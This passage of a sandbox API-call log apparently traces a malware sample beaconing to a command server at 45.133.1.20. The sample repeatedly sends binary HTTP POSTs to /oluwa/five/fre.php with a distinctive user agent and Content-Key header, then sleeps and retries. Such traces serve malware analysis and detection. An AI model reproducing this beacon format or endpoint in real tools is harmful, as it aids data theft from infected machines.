type=1, protocol=6) returned 0x8fc [0262.004] connect (s=0x8fc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0262.032] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0262.032] GetProcessHeap () returned 0x6a0000 [0262.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0262.032] GetProcessHeap () returned 0x6a0000 [0262.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0262.033] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0262.033] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0262.033] GetProcessHeap () returned 0x6a0000 [0262.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9b70 [0262.034] GetProcessHeap () returned 0x6a0000 [0262.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0262.035] GetProcessHeap () returned 0x6a0000 [0262.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0262.035] GetProcessHeap () returned 0x6a0000 [0262.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0262.035] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0262.036] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0262.036] GetProcessHeap () returned 0x6a0000 [0262.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0262.036] GetProcessHeap () returned 0x6a0000 [0262.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0262.037] send (s=0x8fc, buf=0x6bd460*, len=242, flags=0) returned 242 [0262.037] send (s=0x8fc, buf=0x6bb998*, len=159, flags=0) returned 159 [0262.037] GetProcessHeap () returned 0x6a0000 [0262.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0262.037] recv (in: s=0x8fc, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0262.107] GetProcessHeap () returned 0x6a0000 [0262.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0262.107] GetProcessHeap () returned 0x6a0000 [0262.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0262.108] GetProcessHeap () returned 0x6a0000 [0262.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b70 | out: hHeap=0x6a0000) returned 1 [0262.109] GetProcessHeap () returned 0x6a0000 [0262.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0262.109] closesocket (s=0x8fc) returned 0 [0262.110] GetProcessHeap () returned 0x6a0000 [0262.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0262.110] GetProcessHeap () returned 0x6a0000 [0262.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0262.110] GetProcessHeap () returned 0x6a0000 [0262.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0262.111] GetProcessHeap () returned 0x6a0000 [0262.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0262.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1654) returned 0x8fc [0262.115] Sleep (dwMilliseconds=0xea60) [0262.116] GetProcessHeap () returned 0x6a0000 [0262.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0262.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.118] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.125] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0262.141] GetProcessHeap () returned 0x6a0000 [0262.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0262.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.189] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0262.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.190] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.192] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.192] GetProcessHeap () returned 0x6a0000 [0262.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0262.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.197] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0262.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.198] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0262.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.199] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0262.199] GetProcessHeap () returned 0x6a0000 [0262.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0262.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.201] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.202] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.204] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.205] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.206] GetProcessHeap () returned 0x6a0000 [0262.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0262.206] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0262.206] GetProcessHeap () returned 0x6a0000 [0262.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0262.207] GetProcessHeap () returned 0x6a0000 [0262.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0262.207] GetProcessHeap () returned 0x6a0000 [0262.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0262.208] GetProcessHeap () returned 0x6a0000 [0262.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0262.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.219] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0262.233] GetProcessHeap () returned 0x6a0000 [0262.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0262.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.234] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0262.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.246] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.248] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.248] GetProcessHeap () returned 0x6a0000 [0262.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0262.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.250] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0262.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.251] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0262.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.252] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0262.252] GetProcessHeap () returned 0x6a0000 [0262.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0262.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.254] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0262.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.255] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0262.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.256] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0262.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.258] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0262.258] GetProcessHeap () returned 0x6a0000 [0262.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0262.258] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0262.258] GetProcessHeap () returned 0x6a0000 [0262.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0262.258] socket (af=2, type=1, protocol=6) returned 0x900 [0262.258] connect (s=0x900, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0262.290] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0262.290] GetProcessHeap () returned 0x6a0000 [0262.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0262.291] GetProcessHeap () returned 0x6a0000 [0262.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0262.292] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0262.293] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0262.293] GetProcessHeap () returned 0x6a0000 [0262.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba230 [0262.294] GetProcessHeap () returned 0x6a0000 [0262.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0262.294] GetProcessHeap () returned 0x6a0000 [0262.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0262.294] GetProcessHeap () returned 0x6a0000 [0262.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0262.295] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0262.299] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0262.299] GetProcessHeap () returned 0x6a0000 [0262.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0262.300] GetProcessHeap () returned 0x6a0000 [0262.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0262.301] send (s=0x900, buf=0x6bd460*, len=242, flags=0) returned 242 [0262.303] send (s=0x900, buf=0x6bb998*, len=159, flags=0) returned 159 [0262.305] GetProcessHeap () returned 0x6a0000 [0262.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0262.305] recv (in: s=0x900, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0262.383] GetProcessHeap () returned 0x6a0000 [0262.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0262.385] GetProcessHeap () returned 0x6a0000 [0262.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0262.385] GetProcessHeap () returned 0x6a0000 [0262.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba230 | out: hHeap=0x6a0000) returned 1 [0262.387] GetProcessHeap () returned 0x6a0000 [0262.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0262.387] closesocket (s=0x900) returned 0 [0262.388] GetProcessHeap () returned 0x6a0000 [0262.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0262.388] GetProcessHeap () returned 0x6a0000 [0262.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0262.389] GetProcessHeap () returned 0x6a0000 [0262.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0262.390] GetProcessHeap () returned 0x6a0000 [0262.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0262.390] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x165c) returned 0x900 [0262.393] Sleep (dwMilliseconds=0xea60) [0262.397] GetProcessHeap () returned 0x6a0000 [0262.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0262.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.399] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0262.424] GetProcessHeap () returned 0x6a0000 [0262.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0262.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.426] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0262.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.427] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.429] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.429] GetProcessHeap () returned 0x6a0000 [0262.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0262.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.430] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0262.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.432] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0262.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.433] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0262.433] GetProcessHeap () returned 0x6a0000 [0262.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0262.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.434] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.435] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.437] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.438] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.438] GetProcessHeap () returned 0x6a0000 [0262.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0262.438] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0262.441] GetProcessHeap () returned 0x6a0000 [0262.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0262.442] GetProcessHeap () returned 0x6a0000 [0262.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0262.442] GetProcessHeap () returned 0x6a0000 [0262.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0262.443] GetProcessHeap () returned 0x6a0000 [0262.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0262.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.444] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0262.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.449] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0262.458] GetProcessHeap () returned 0x6a0000 [0262.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0262.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.459] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0262.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.460] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0262.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.461] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.461] GetProcessHeap () returned 0x6a0000 [0262.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0262.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.463] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0262.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.464] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0262.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0262.485] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0262.485] GetProcessHeap () returned 0x6a0000 [0262.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0262.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.486] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0262.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.487] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0262.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.488] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0262.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.488] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0262.488] GetProcessHeap () returned 0x6a0000 [0262.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0262.489] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0262.489] GetProcessHeap () returned 0x6a0000 [0262.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0262.489] socket (af=2, type=1, protocol=6) returned 0x904 [0262.489] connect (s=0x904, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0262.518] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0262.518] GetProcessHeap () returned 0x6a0000 [0262.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0262.518] GetProcessHeap () returned 0x6a0000 [0262.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0262.519] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0262.520] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: 